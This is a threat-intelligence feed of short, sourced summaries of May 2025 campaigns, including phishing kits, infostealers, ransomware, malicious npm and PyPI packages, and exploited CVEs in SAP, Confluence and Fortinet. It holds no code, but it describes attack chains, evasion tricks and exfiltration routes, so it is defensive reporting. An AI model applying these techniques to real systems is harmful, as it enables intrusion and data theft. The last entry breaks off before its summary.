SpiderLabs researchers have identified that Tycoon2FA-linked phishing campaigns are targeting Microsoft 365 users. These campaigns leverage malformed URLs containing backslash characters (https:\\) instead of forward slashes. Despite this unconventional formatting, most web browsers still resolve these links, leading unsuspecting victims to credential harvesting pages. This technique is employed by threat actors to bypass email security filters and evade URL-based detection systems, ultimately aiming to steal Microsoft 365 credentials. The infrastructure observed involves domains hosted on services like Azure and Cloudflare Workers.
Source: https://x.com/SpiderLabs/status/1924486856902586689
2025-05-22
Koishi_Chatbot_Plugin_Steals_Messages
LOW
Intel Source:
Socket
Intel Name:
Koishi_Chatbot_Plugin_Steals_Messages
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at Socket have discovered a malicious npm package, koishi-plugin-pinhaofa, designed to exfiltrate data from Koishi chatbots. Marketed as a spelling auto-correct helper, the plugin, once installed, silently scans all chatbot messages for any eight-character hexadecimal string. Upon finding such a string, which could represent sensitive data like commit hashes, API tokens, or checksums, the plugin forwards the entire message content to a hardcoded QQ account (UIN: 1821181277) controlled by the threat actor, who uses the npm alias kuminfennel. This exposes any secrets or credentials embedded within or surrounding the trigger string. This activity represents a supply chain attack targeting chatbot frameworks, exploiting the trust developers place in community plugins and the unrestricted access these plugins often have within the bot process.
Source: https://socket.dev/blog/malicious-koishi-chatbot-plugin?utm_medium=feed
2025-05-22
Confluence_Hit_by_ELPACO_Ransomware
MEDIUM
+
Intel Source:
The DFIR Report
Intel Name:
Confluence_Hit_by_ELPACO_Ransomware
Date of Scan:
2025-05-22
Impact:
MEDIUM
Summary:
The DFIR Report researchers have observed that an unpatched, internet-facing Confluence server was compromised via CVE-2023-22527, leading to the deployment of ELPACO-team ransomware (a Mimic variant) approximately 62 hours later. The threat actor initially used the exploit to deploy a Metasploit payload and establish C2 via IP. Following initial access, the actor performed privilege escalation using RPCSS named pipe impersonation, created a local administrator account ("noname"), and installed AnyDesk for persistent remote access via a self-hosted server. Extensive discovery, including network scanning with SoftPerfect NetScan and attempted Zerologon exploitation, preceded credential harvesting using Mimikatz and Impacket's Secretsdump. Lateral movement was achieved using the compromised domain administrator credentials via Impacket wmiexec and RDP.
Source: https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/#indicators
2025-05-22
AutoIT_Based_AsyncRAT_Delivery_Chain
LOW
+
Intel Source:
ISC.SANS
Intel Name:
AutoIT_Based_AsyncRAT_Delivery_Chain
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at ISC.SANS have found a malware campaign that delivers a RAT through a dual-layer AutoIT script framework. The first executable downloads an AutoIT interpreter and a second obfuscated AutoIT script that decodes and executes commands using a custom Wales() function. Persistence is enabled using a custom shortcut in the Startup folder that runs JavaScript and initiates further execution. The final payload, injected into a jsc.exe process as a DLL called Urshqbgpm.dll, attempts to communicate with a known AsyncRAT C2 server and includes references to PureHVNC functionality.
Source: https://isc.sans.edu/diary/31960
2025-05-22
SEO_Poisoning_Infostealer_Trends
LOW
+
Intel Source:
ASEC
Intel Name:
SEO_Poisoning_Infostealer_Trends
Date of Scan:
2025-05-22
Impact:
LOW
Summary:
Researchers at ASEC have identified ongoing trends in Infostealer malware spread throughout April 2025, focusing on the continued use of crack and keygen disguises to entice victims. These threats, typically promoted by SEO poisoning to appear at the top of search results, included well-known Infostealers such as LummaC2, Vidar, and StealC.
Source: https://asec.ahnlab.com/en/88062/
2025-05-21
DBatLoader_Targeting_Turkish_Users
LOW
+
Intel Source:
ASEC
Intel Name:
DBatLoader_Targeting_Turkish_Users
Date of Scan:
2025-05-21
Impact:
LOW
Summary:
ASEC researchers have identified a phishing campaign targeting Turkish users with malware known as DBatLoader (also called ModiLoader). The attackers send Turkish-language phishing emails impersonating bank transaction notifications that contain a malicious RAR file with a BAT script. This initial BAT script executes DBatLoader, which then leverages a series of obfuscated batch scripts and legitimate Windows tools to hide its activity and bypass security systems in order to install SnakeKeylogger. This malware steals system information, keyboard input and clipboard data and sends the stolen data to the attackers’ Telegram C2 channel.
Source: https://asec.ahnlab.com/ko/87980/
2025-05-21
PyPI_Backdoor_Targets_Developers
LOW
+
Intel Source:
Reversinglabs
Intel Name:
PyPI_Backdoor_Targets_Developers
Date of Scan:
2025-05-21
Impact:
LOW
Summary:
Researchers at ReversingLabs have uncovered a malicious Python package called "dbgpkg" on the PyPI repository, disguised as a debugging tool. Once installed by developers, it deploys a backdoor that allows attackers to execute malicious code and exfiltrate sensitive data. The malware wraps functions of the requests and socket modules so that its code runs in the background; that code downloads a public key from Pastebin and uses a tool called Global Socket Tool to bypass firewalls and connect to the attacker’s server. This campaign is believed to be linked to Phoenix Hyena/DumpForums, which has been targeting Russian interests in support of Ukraine since 2022.
Source: https://www.reversinglabs.com/blog/backdoor-implant-discovered-on-pypi-posing-as-debugging-utility
2025-05-20
Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
Date of Scan:
2025-05-20
Impact:
MEDIUM
Summary:
ANY.RUN researchers have analyzed the Tycoon 2FA Phishing-as-a-Service (PhaaS) platform, which has been active since August 2023, targets Microsoft 365 and Gmail credentials, and has demonstrated continuous evolution in its anti-detection mechanisms. This AiTM phishing kit employs a multi-stage attack, starting with obfuscated JavaScript on a landing page, which performs several checks ("nomatch" decoy, domain comparison) before proceeding. It then uses Cloudflare Turnstile CAPTCHA (or other CAPTCHA services like reCAPTCHA and IconCaptcha in later variants) and C2 server queries to validate the user before delivering the core phishing content. Later stages involve further Base64/XOR obfuscation, encrypted payload delivery, and dynamic URL generation for data exfiltration to a C2 infrastructure often using .ru, .es, .su, .com, and .net TLDs. Notable new evasion techniques observed between December 2024 and May 2025 include debugger timing checks, debug environment detection (Selenium, PhantomJS), keystroke interception, context menu blocking, dynamic multimedia loading from legitimate CDNs for victim-tailored lures, invisible JavaScript obfuscation, custom fake page redirects, custom CAPTCHAs, browser fingerprinting, and AES encryption for payload obfuscation.
Source: https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/
2025-05-20
PowerShell_Loader_Executes_Remcos_RAT
LOW
+
Intel Source:
Qualys
Intel Name:
PowerShell_Loader_Executes_Remcos_RAT
Date of Scan:
2025-05-20
Impact:
LOW
Summary:
Qualys researchers have identified a new PowerShell-based shellcode loader that filelessly loads and executes a variant of Remcos RAT. The attackers deliver this malware inside ZIP archives that contain malicious LNK files disguised as Office documents. When a user opens such a file, it triggers an HTA file via mshta.exe, which then downloads and executes obfuscated PowerShell code that runs directly in the system’s memory. It leverages Windows functions to load a Remcos RAT variant known as K-Loader. This variant has extensive capabilities including keylogging, screen capture, clipboard access, UAC bypass, and process hollowing for evasion.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat
2025-05-20
China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
Date of Scan:
2025-05-20
Impact:
MEDIUM
Summary:
EclecticIQ researchers have uncovered that China-nexus state-sponsored groups such as UNC5221, UNC5174 and CL-STA-0048 are exploiting an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer. The threat actors leverage the resulting remote code execution to deploy malicious webshells, enabling command execution and the installation of additional payloads like KrustyLoader and the SNOWLIGHT RAT. They are targeting government and essential service organizations in the UK, US and Saudi Arabia, aiming to compromise critical infrastructure, exfiltrate sensitive data, and maintain persistence.
Source: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
2025-05-20
FrigidStealer_Malware
LOW
+
Intel Source:
Wazuh
Intel Name:
FrigidStealer_Malware
Date of Scan:
2025-05-20
Impact:
LOW
Summary:
Wazuh researchers have uncovered a new information-stealing malware named FrigidStealer targeting macOS users since January 2025 and potentially linked to the EvilCorp syndicate. It is being distributed through fake browser update pages on compromised websites, tricking users into downloading a malicious disk image. Upon execution, the malware asks for the user’s password via an AppleScript pop-up to bypass macOS Gatekeeper, then registers itself as an application and ensures it runs every time the system starts. FrigidStealer exfiltrates sensitive data including browser credentials, files, system information, and cryptocurrency wallet details and secretly sends it to a remote server using DNS tunneling. It terminates its own process to evade detection.
Source: https://wazuh.com/blog/detecting-frigidstealer-malware-with-wazuh/
2025-05-19
Earth_Ammit_Targets_Drone_Supply_Chain
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Earth_Ammit_Targets_Drone_Supply_Chain
Date of Scan:
2025-05-19
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered that the Chinese-speaking threat group Earth Ammit undertook two synchronized multi-wave campaigns VENOM and TIDRONE between 2023 and 2024, with the goal of disrupting drone supply chains and compromising high-value targets in Taiwan and South Korea. The VENOM campaign targeted software service providers with open-source tools for stealth and low cost, but the subsequent TIDRONE campaign targeted the military industry with custom-built malware such as CXCLNT and CLNTEND for cyberespionage.
Source: https://www.trendmicro.com/en_us/research/25/e/earth-ammit.html
2025-05-19
APT36_and_Hacktivists_Targeting_India
HIGH
+
Intel Source:
CyberProof
Intel Name:
APT36_and_Hacktivists_Targeting_India
Date of Scan:
2025-05-19
Impact:
HIGH
Summary:
Researchers at CyberProof have observed a surge in cyber-attacks targeting Indian systems, coinciding with heightened geopolitical tensions following a terrorist attack in Baisaran Valley on April 22, 2025. The Pakistan-linked APT36 (Transparent Tribe) has been observed targeting Indian government and defense offices with phishing URLs and their known Crimson RAT, a tool capable of extensive information theft and voice recording. Simultaneously, hacktivist groups including 'Cyber Group HOAX1337', 'IOK Hacker', and 'National Cyber Crew' have reportedly targeted Indian educational institutes. Lures used by APT36 include malicious PDF files and macro-embedded XLSM documents, often themed around official Indian government or military communications, such as those impersonating Jammu & Kashmir Police or the Indian Air Force. One identified PowerPoint (PPAM) file, "Report & Update Regarding Pahalgam Terror Attack.ppam," contained a malicious macro consistent with older APT36 droppers, designed to deploy Crimson RAT.
Source: https://www.cyberproof.com/blog/cyber-attacks-rise-as-tension-mounts-across-india-pakistan-border-post-terrorist-attack/
2025-05-19
Ransomware_Hits_Financial_Firms
LOW
+
Intel Source:
ASEC
Intel Name:
Ransomware_Hits_Financial_Firms
Date of Scan:
2025-05-19
Impact:
LOW
Summary:
Researchers from ASEC have identified a rise in cyber threats targeting financial institutions in Korea and around the world in April 2025. The research focuses on phishing and malware efforts, providing thorough insights into the top ten malware families and compromised Korean account data circulating on Telegram. A notable incident occurred when a threat actor, B_ose, sold over 1,700 stolen credit and debit card details on the Exploit forum, with 80% possibly valid and carrying sensitive information such as CVV numbers and addresses.
Source: https://asec.ahnlab.com/en/87975/
2025-05-18
Analysis_of_APT_C_51_Recent_Attacks
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
Analysis_of_APT_C_51_Recent_Attacks
Date of Scan:
2025-05-18
Impact:
MEDIUM
Summary:
The 360 Advanced Threat Research Institute reported that APT-C-51 (also known as APT35, Charming Kitten), an actor motivated by political and economic interests, conducted an espionage campaign targeting the Middle East. The attack, observed around January 2025, started with LNK files (Biography of Mr.leehu hacohn.lnk) that, upon execution, released a decoy PDF and a compressed archive (osf.zip). This archive contained multiple DLLs, including the malicious Wow.dll, which performed environment checks and decrypted a gclib file using AES (key: {}nj45kdada0slfk) to obtain a PowerShell script. This script was then executed by new.dll, leading to the deployment of the PowerLess Trojan (version: 3.3.4).
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247505927&idx=1&sn=d2298d5b26d0f1cfb53c4304a0c55c38
2025-05-18
Technical_Investigation_of_TransferLoader
LOW
+
Intel Source:
Zscaler
Intel Name:
Technical_Investigation_of_TransferLoader
Date of Scan:
2025-05-18
Impact:
LOW
Summary:
Researchers at Zscaler have analyzed a new malware loader named TransferLoader, active since at least February 2025. This loader, observed deploying Morpheus ransomware at an American law firm, contains multiple embedded components: a downloader, a backdoor, and a specialized loader for the backdoor. All components utilize anti-analysis techniques such as PEB debugging checks, dynamic API resolution via hashing, junk code insertion, and runtime string decryption using unique 8-byte XOR keys. The backdoor module communicates with its C2 server via HTTPS or raw TCP, using custom packet structures and a stream cipher for encryption, and notably employs the InterPlanetary File System (IPFS) as a decentralized fallback mechanism for C2 updates. The shared code similarities and evasion methods across TransferLoader components suggest a common developer.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-transferloader
2025-05-18
Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
Date of Scan:
2025-05-18
Impact:
MEDIUM
Summary:
CERT-AGID researchers have identified a large-scale Adwind RAT distribution campaign targeting Italy, Spain, and Portugal, corroborating earlier findings by Fortinet. The attackers employ spear-phishing emails with PDF attachments (Document.pdf, Invoice.pdf) that contain links to cloud storage services like OneDrive or Dropbox. These links lead to the download of an obfuscated VBS or HTML file, which, once deobfuscated, downloads a decoy PDF from Google Drive and, in parallel, a ~90MB ZIP archive from a URL. Unlike previous Adwind campaigns that directly dropped JAR files, this variant delivers a ZIP package containing both the necessary Java environment and the Adwind JAR file disguised as a PNG image (InvoiceXpress.png). This JAR is executed via a CMD script (InvoiceXpress.cmd). The Adwind configuration, encrypted with AES in ECB mode, points to a C2 subdomain on port 4414, consistent with previous Adwind infrastructure.
Source: https://cert-agid.gov.it/news/distribuzione-mirata-in-italia-di-adwind/
2025-05-17
Ransomware_Groups_Exploiting_SAP_Vulnerability
LOW
+
Intel Source:
Reliaquest
Intel Name:
Ransomware_Groups_Exploiting_SAP_Vulnerability
Date of Scan:
2025-05-17
Impact:
LOW
Summary:
ReliaQuest researchers have uncovered that the Russian ransomware group BianLian and the operators of RansomEXX (also known as Storm-2460) are exploiting CVE-2025-31324 in SAP NetWeaver Visual Composer. This vulnerability allows unauthenticated attackers to upload and run malicious files, resulting in remote code execution. The attackers leverage it to upload malicious JSP webshells to gain initial access and then deploy post-exploitation tools like Brute Ratel and Heaven's Gate for command-and-control, evasion and further compromise.
Source: https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
2025-05-17
FortiVoice_Zero_Day_RCE_Exploited
LOW
+
Intel Source:
Truesec
Intel Name:
FortiVoice_Zero_Day_RCE_Exploited
Date of Scan:
2025-05-17
Impact:
LOW
Summary:
Researchers at Truesec have discovered that CVE-2025-32756, a zero-day stack-based buffer overflow vulnerability in Fortinet products, has been extensively exploited in the wild. The vulnerability affects FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamera, allowing remote, unauthenticated attackers to execute arbitrary commands via specially crafted HTTP requests with a modified hash cookie.
Source: https://www.truesec.com/hub/blog/cve-2025-32756-fortivoice-zero-day-buffer-overflow-exploited
2025-05-16
PyInstaller_Malware_on_MacOS_Users
LOW
+
Intel Source:
Jamf Threat Labs
Intel Name:
PyInstaller_Malware_on_MacOS_Users
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Jamf Threat Labs uncovered a new infostealer targeting macOS users. It is delivered through PyInstaller, a legitimate tool that converts Python scripts into Mach-O executables. This technique allows attackers to execute malicious Python payloads without requiring a Python installation on the system, which matters because Apple no longer includes Python by default. The malware samples, named stl installer and sosorry, leverage fake password prompts to trick users into giving up their credentials. They can also run additional malicious AppleScript commands from a remote server, steal saved passwords and other sensitive information from the macOS Keychain, and search for cryptocurrency wallets to exfiltrate private keys.
Source: https://www.jamf.com/blog/pyinstaller-malware-jamf-threat-labs/
2025-05-16
DarkCloud_Stealer
LOW
+
Intel Source:
Palo Alto
Intel Name:
DarkCloud_Stealer
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Palo Alto researchers have discovered a new data-stealing malware called DarkCloud Stealer, which has been active since 2022. It is distributed primarily through phishing emails that contain either a malicious RAR file or a PDF designed to trick users into downloading the RAR from a file-sharing site. The archive contains an AutoIt-compiled executable which unpacks and executes the final payload, DarkCloud Stealer. This stealer is capable of harvesting a wide range of sensitive data, including browser and email credentials, FTP details, contact lists, system details and screenshots. It has been targeting multiple industries such as finance, manufacturing, media and entertainment, and government, with a particular focus on the U.S. and Brazil.
Source: https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/
2025-05-16
Devices_Hit_by_Stack_Overflow
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Devices_Hit_by_Stack_Overflow
Date of Scan:
2025-05-16
Impact:
MEDIUM
Summary:
Fortinet researchers have discovered a stack-based buffer overflow vulnerability (CWE-121) in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products that could allow a remote unauthenticated attacker to execute arbitrary code or commands using specially crafted HTTP requests. Notably, this vulnerability has been extensively exploited in the wild, specifically targeting FortiVoice devices.
Source: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
2025-05-16
PyPI_Packages_Targets_Solana_Developers
LOW
+
Intel Source:
Reversinglabs
Intel Name:
PyPI_Packages_Targets_Solana_Developers
Date of Scan:
2025-05-16
Impact:
LOW
Summary:
Researchers at ReversingLabs have discovered a malicious Python package called solana-token on the PyPI repository. It specifically targets Solana blockchain developers to steal source code and developer secrets. The package masquerades as a legitimate tool for the Solana blockchain but secretly sends Python files and their contents to a hardcoded IP address. The solana-token package was downloaded over 600 times and even reused the name of an earlier malicious package before it was removed.
Source: https://www.reversinglabs.com/blog/same-name-different-hack-pypi-package-targets-solana-developers
2025-05-15
Mamona_Ransomware
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Mamona_Ransomware
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
Researchers from ANY.RUN have uncovered a new ransomware strain called Mamona that first appeared in May 2025 and is believed to be linked to BlackLock affiliates. This ransomware operates offline, meaning it encrypts files on the victim's system without connecting to a remote server. It encrypts files, appending the .HAes extension, and drops ransom notes (README.HAes.txt) claiming data has been stolen. However, no data exfiltration or C2 communication has been observed. The group employs simple obfuscation techniques such as delay loops, and the malware deletes itself after running to avoid detection. It relies on custom encryption methods instead of standard libraries, but a decryption tool exists that can recover files. This easy-to-use ransomware lowers the entry barrier for less skilled threat actors to contribute to wider ransomware activity.
Source: https://any.run/cybersecurity-blog/mamona-ransomware-analysis/
2025-05-15
Python_InfoStealer_with_Phishing_Server
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_InfoStealer_with_Phishing_Server
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Researchers at ISC.SANS have found a Python-based InfoStealer that not only has basic capabilities such as anti-debugging, persistence via registry and scheduled tasks, keylogging, clipboard capture, and periodic snapshots, but also embeds a phishing web server using Flask. The malware sends data encrypted with the Fernet module to a Telegram channel and operates its modules in separate threads to maximize efficiency.
Source: https://isc.sans.edu/diary/rss/31924
2025-05-15
Gremlin_Stealer
LOW
+
Intel Source:
Palo Alto
Intel Name:
Gremlin_Stealer
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Researchers from Palo Alto have discovered a new info-stealing malware called Gremlin Stealer that first emerged in March 2025. It is written in C and is capable of stealing sensitive data from Windows systems such as passwords, browser cookies, form inputs and credit card information from popular browsers such as Chrome and Gecko-based browsers. It also targets cryptocurrency wallets (Exodus, MetaMask, Monero), FTP clients (TotalCommander, FileZilla), VPNs, Steam, Telegram and Discord. The malware collects system information, takes screenshots, swaps crypto wallet addresses and sends all stolen data in a ZIP file to a command-and-control server or via Telegram. The operation appears to make money both by selling the malware and through the stolen data.
Source: https://unit42.paloaltonetworks.com/new-malware-gremlin-stealer-for-sale-on-telegram/
2025-05-15
Stealerium_Infostealer
LOW
+
Intel Source:
Seqrite
Intel Name:
Stealerium_Infostealer
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Seqrite Labs researchers have uncovered an ongoing campaign targeting U.S. citizens during tax season by taking advantage of the annual tax filing deadline. Threat actors are sending phishing emails containing malicious LNK files disguised as legitimate tax-related documents to deceive users into opening them. Once a user clicks on the attachment, the LNK file executes hidden PowerShell commands that download and install a data-stealing malware called Stealerium. This malware is designed to steal sensitive information like browser passwords, crypto wallets, chat logs, VPN and Wi-Fi credentials, and other system details.
Source: https://www.seqrite.com/blog/threat-actors-are-targeting-us-tax-session-with-new-tactics-of-stealerium-infostealer/
2025-05-15
Scattered_Spider_Hits_UK_Retail
HIGH
+
Intel Source:
Cyberint
Intel Name:
Scattered_Spider_Hits_UK_Retail
Date of Scan:
2025-05-15
Impact:
HIGH
Summary:
Researchers at Cyberint have discovered that the financially motivated threat group Scattered Spider, also known as Roasting 0ktapus or Scatter Swine, is most likely responsible for recent cyberattacks against UK retail organizations, with the DragonForce ransomware cartel being blamed for the extortion stage. Scattered Spider has been active since 2022, transitioning from targeting telecom and BPO sectors to attacking high-leverage businesses such as retail, particularly during peak seasons. The organization deploys advanced identity-centric approaches, such as social engineering, SMS and Telegram phishing, SIM swapping, and MFA fatigue attacks. They use vulnerabilities such as CVE-2015-2291 and CVE-2021-35464, as well as programs like STONESTOP, POORTRY, and various remote access applications, to disable protections, gain persistence, and exfiltrate data.
Source: https://cyberint.com/blog/dark-web/meet-scattered-spider-the-group-currently-scattering-uk-retail-organizations/
2025-05-15
TheWizards_APT_Group_Activity
MEDIUM
+
Intel Source:
ESET Research
Intel Name:
TheWizards_APT_Group_Activity
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
Researchers at ESET have observed the activity of TheWizards, a China-aligned APT group active since at least 2022, targeting entities in the Philippines, Cambodia, UAE, mainland China, and Hong Kong. The group employs a sophisticated adversary-in-the-middle (AitM) tool named Spellbinder, which exploits IPv6 Stateless Address Autoconfiguration (SLAAC) spoofing within compromised networks. This technique allows TheWizards to intercept local network traffic, specifically DNS requests for popular Chinese software update domains (e.g., Tencent QQ, Sogou Pinyin), and redirect victims to attacker-controlled servers delivering malicious updates. These updates deploy a downloader, often disguised as a legitimate DLL side-loaded by abused executables, which in turn fetches and executes the modular .NET backdoor, WizardNet.
Source: https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/
2025-05-15
Pupkin_Stealer
LOW
+
Intel Source:
Rixed Labs
Intel Name:
Pupkin_Stealer
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
A recent analysis details Pupkin Stealer, a straightforward .NET-based info-stealer first identified in April 2025. It is likely developed by a Russian-speaking freelancer or novice developer known as "Ardent." Pupkin targets Windows systems, running multiple tasks to steal credentials from Chromium browsers, Discord tokens, active Telegram sessions, specific desktop files (.pdf, .txt, .sql, .jpg, .png), and even desktop screenshots. The malware relies on standard .NET libraries and embeds dependencies using Costura.Fody, which results in high file entropy but lacks advanced evasion techniques or persistence mechanisms. The stolen data is compressed into a ZIP archive and exfiltrated via a hardcoded Telegram bot API, though the exfiltration process has flaws, such as incorrect byte-to-string conversion and improper MIME type handling.
Source: https://muff-in.github.io/blog/pupkin-info-stealer-analysis/
2025-05-15
Gunra_Ransomware_Targeting_Windows
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Gunra_Ransomware_Targeting_Windows
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
Researchers at CYFIRMA have discovered a new ransomware strain called Gunra that mainly targets Windows-based systems in a variety of worldwide industries, including real estate, pharmaceuticals, and manufacturing. Gunra, based on Conti ransomware, uses double-extortion techniques by encrypting files with the ".ENCRT" extension and threatening to expose stolen data over a Tor-hosted page. The malware uses complex tactics such as anti-analysis with the IsDebuggerPresent API, evasion of rule-based detections, obfuscation, and shadow copy deletion via WMI.
Source: https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/
2025-05-15
Iranian_Espionage_via_Fake_Model_Site
LOW
+
Intel Source:
unit42
Intel Name:
Iranian_Espionage_via_Fake_Model_Site
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Unit 42 researchers have found an emerging Iranian cyberespionage operation that used a fake website to pose as a German model agency. The website, which imitates the branding of the firm, uses obfuscated JavaScript to gather comprehensive visitor data, including IP addresses, browser fingerprints, and screen resolutions, most likely to support precise targeting of visitors. A bogus profile with an invalid hyperlink to a private album points to preparations for spear phishing or other social engineering attacks.
Source: https://unit42.paloaltonetworks.com/iranian-attackers-impersonate-model-agency/
2025-05-15
Criminals_Targeting_End_of_Life_Routers
LOW
+
Intel Source:
Bitdefender
Intel Name:
Criminals_Targeting_End_of_Life_Routers
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
The FBI has issued a cybersecurity advisory about a surge in malicious activity targeting end-of-life (EOL) routers, with a particular focus on outdated Linksys models. Threat actors are exploiting known and unpatchable vulnerabilities commonly found in the built-in remote management software of these unsupported devices. The FBI reports that attackers are deploying malware such as 5Socks and Anyproxy to gain persistent root-level access, effectively converting the compromised routers into botnet infrastructure. These devices are then used to steal sensitive user information such as login credentials and financial details, to launch DDoS attacks, or are sold as proxy nodes to other threat actors.
Source: https://www.bitdefender.com/en-us/blog/hotforsecurity/fbi-end-of-life-routers-cyberattacks
2025-05-15
Pig_Butchering_Operation
LOW
+
Intel Source:
Infoblox
Intel Name:
Pig_Butchering_Operation
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Infoblox uncovered a cryptocurrency "pig butchering" scam operation disguised as a remote job offer that began with a Telegram message from a fake company called Corner Office Consultants. The fake job involved repetitive online tasks for commissions on a website impersonating the legitimate marketing firm Marble Media. After victims complete some tasks, the scammers lure them into depositing cryptocurrency by creating a negative account balance that must be topped up to continue working or to withdraw supposed earnings. The cybercriminals leverage fake identities built from stock photos and later switched to romance scams when the task-based fraud stalled.
Source: https://blogs.infoblox.com/threat-intelligence/telegram-tango-dancing-with-a-scammer/
2025-05-15
Fake_SSA_Emails_Install_Remote_Access_Tool
MEDIUM
+
Intel Source:
MalwareBytes
Intel Name:
Fake_SSA_Emails_Install_Remote_Access_Tool
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
Malwarebytes researchers have identified a phishing campaign leveraging fake US Social Security Administration (SSA) emails to trick users into installing the legitimate remote access tool ScreenConnect. These deceptive emails, sent by a group known as Molatori, claim that a Social Security statement is ready to download, but only on Windows PCs. When victims click the link, they unknowingly install ScreenConnect, which gives attackers full remote access to their systems. This access allows them to execute commands, transfer files, install further malware and exfiltrate sensitive data like banking details and personal identification numbers.
Source: https://www.malwarebytes.com/blog/news/2025/04/fake-social-security-statement-emails-trick-users-into-installing-remote-tool
2025-05-15
Uncovering_SuperShell_and_CobaltStrike
LOW
+
Intel Source:
Hunt.IO
Intel Name:
Uncovering_SuperShell_and_CobaltStrike
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Hunt.IO researchers have discovered a collection of hacking tools, including SuperShell malware and Cobalt Strike beacons, that were accessible on the internet. These tools were unintentionally exposed by threat actors while setting up their attack infrastructure. SuperShell is a new C2 framework capable of targeting multiple operating systems, using SSH connections to control compromised machines. Additionally, the researchers identified Cobalt Strike beacons using separate infrastructure and deceptive certificates impersonating jQuery to evade detection.
Source: https://hunt.io/blog/uncovering-supershell-and-cobalt-strike-from-an-open-directory
2025-05-15
ContagiousInterview_Campaign_Infrastructure
LOW
Intel Source:
Team Cymru
Intel Name:
ContagiousInterview_Campaign_Infrastructure
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Team Cymru researchers have disclosed network infrastructure details associated with DPRK-linked actors conducting "ContagiousInterview" campaigns, observed over several years as of April 2025. The threat actors utilize front companies, such as BlockNovas LLC, with associated domains hosted on Russian infrastructure, specifically IP addresses assigned to TransTelecom and InvestStroyTrest. InvestStroyTrest operates a ferry service between Russia and North Korea from Rajin, KP, a service recently highlighted by a captured North Korean soldier, suggesting a potential link between the cyber infrastructure provider and physical logistics supporting DPRK objectives.
Source: https://x.com/teamcymru_S2/status/1915827990774063179
2025-05-15
Swan_Vector_APT_Targets_East_Asia
LOW
Intel Source:
Seqrite
Intel Name:
Swan_Vector_APT_Targets_East_Asia
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
Researchers from Seqrite Labs have discovered a cyber-espionage campaign known as Swan Vector that targeted businesses in Taiwan and Japan, notably those in the education and mechanical engineering fields. The attackers use fake resumes as decoys to deploy a four-stage malware chain that starts with a malicious LNK file and ends with the execution of Cobalt Strike shellcode. To avoid detection, the campaign uses a variety of stealth techniques such as DLL sideloading, API hashing, and direct syscalls, while also abusing legitimate tools such as RunDLL32.exe.
Source: https://www.seqrite.com/blog/swan-vector-apt-targeting-taiwan-japan-dll-implants/
2025-05-15
Chihuahua_Stealer
LOW
Intel Source:
G-Data
Intel Name:
Chihuahua_Stealer
Date of Scan:
2025-05-15
Impact:
LOW
Summary:
GDATA Security researchers have identified a new .NET-based malware called Chihuahua Stealer, which is capable of stealing sensitive information from compromised systems. It first emerged in April 2025, spreading through a malicious PowerShell script hidden in a Google Drive document. Once executed, it mainly steals information from web browsers, cryptocurrency wallets and specific user files on the system. The malware leverages scheduled tasks for persistence and downloads additional payloads from backup servers. It compresses the stolen data into a zip file with a .chihuahua extension, encrypted with AES-GCM through Windows APIs. The encrypted data is then exfiltrated over HTTPS, and the malware attempts to delete its traces.
Source: https://www.gdatasoftware.com/blog/2025/05/38199-chihuahua-infostealer
2025-05-15
Nitrogen_Dropping_Cobalt_Strike
MEDIUM
Intel Source:
Nextron Systems
Intel Name:
Nitrogen_Dropping_Cobalt_Strike
Date of Scan:
2025-05-15
Impact:
MEDIUM
Summary:
